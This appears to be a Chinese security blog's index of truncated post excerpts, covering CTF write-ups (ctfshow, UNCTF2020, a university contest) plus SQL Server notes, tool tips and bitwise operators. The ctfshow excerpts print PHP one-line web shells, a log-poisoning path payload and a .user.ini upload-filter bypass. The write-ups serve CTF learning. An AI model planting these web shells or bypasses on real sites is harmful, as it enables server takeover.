【原创】2020年西南石油大学「智仁杯」网络安全技术大赛(web1+misc1、2)
这次比赛一道题都没出,misc1就差一点点了哎 这次有借口杂项有密码学我完全不懂啊哈哈 web题简直难得不讲武德 没有签到题没有签到题没有签到题 web1 359度防护网站 [huayang]地址:http://182.150.46.187:8802/ 看这种就扫后台 看见有泄漏文件 /index.php.bak 一个登陆地址 /administrator.html 说不爆破就不爆破嘛 也确实爆不…
【原创】总结一些SQL server知识(标准SQL语句)
使用T-sql创建数据库: create  database   database_name on  primary ( name='',             逻辑文件名 filename='',         物理文件名 size=,                文件大小 maxsize=,             文件最大值 filegrowth=           文件增长量 ) …
【原创】强烈安利doge(多吉)搜索引擎
美,是在是太美了 在日益繁杂的社会不知不觉这种简洁会让人一下就爱上 因为美就这么强烈的推荐吗 一张图足以让你们尖叫 想必已经不用多说了吧 卧槽wocao在谷被q的今天还能有如此一款美丽的搜索引擎 反正吹爆就完事了 目前尚不知道火狐和safari浏览器如何设置 但谷歌浏览器完美使用!!! 方法 首先你先要访问一下这个搜索引擎https://www.dogedoge.com/ 然后 你会看见这下面会有…
【原创】将caj转换成pdf
[huayang]首先要下载这个软件:https://pan.baidu.com/s/1pGLTnhGnri2CH49xRM00yQ 提取码:739q 安装完成后打开文献 我们再点击右上角的文件 选择打印 选择这些参数 点击确定后会弹出保存文件的窗口 可以看见有pdf格式我们保存为asd 等待转换完成后即可看见asd.pdf 可以正常打开 [/huayang]
【原创】UNCTF2020—web(待更)
本次大赛实则只做出签到题,但web的payload我已经得出当时怎么也打不出来(一摸一样的,但当时就是打不出来) 就姑且算作是做了两题 easy_ssrf 简单的ssrf 这题主要考察的是文件穿越,和ctfshow月饼杯第二题最后一道类似 先来看看源码 首先匹配unctf.com 这样我们来到第二关 可以看见有过滤,这里我们要注意一个file_get_contents 可以看作是ssrf的黑魔法,…
【原创】ctfshow—web(1—14)
web1 [huayang]web2 手注 sqlmap web3 web4 payload ?url=/var/log/nginx/access.log 看日志 写入一句话 <?php @eval($_POST[b]);?> web5 md5碰撞v1只能用字母v2只能用数字 ctype_alpha — 做纯字符检测 is_numeric() 函数用于检…
【原创】浅谈与运算(&)、或运算(|)、异或运算(^)
此文章由ctfshow萌新计划web5有感而出 运算(&) 运算规则: 0&0=0;0&1=0;1&0=0;1&1=1 即;同为1时为1,其余为0 (一假为假) 比如12 & 10 = 8 计算过程则是先把12和10划为二进制然后依据二进制进行运算 如果二进制位数不对齐则是则用0进行补全 比如144& 888 = 16 或运算(|) 运算规则…
【原创】ctfshow—web文件上传
[huayang] web151——152 写入一句话改为png格式 <?php @eval(@$_POST['g']); ?> 上传并抓包并改包 连接蚁剑 web153 此题过滤了php后缀 首先创建一个.user.ini GIF89a auto_prepend_file=a.php 再创建一个a.png <?php eval($_GET['a']); 上传抓包…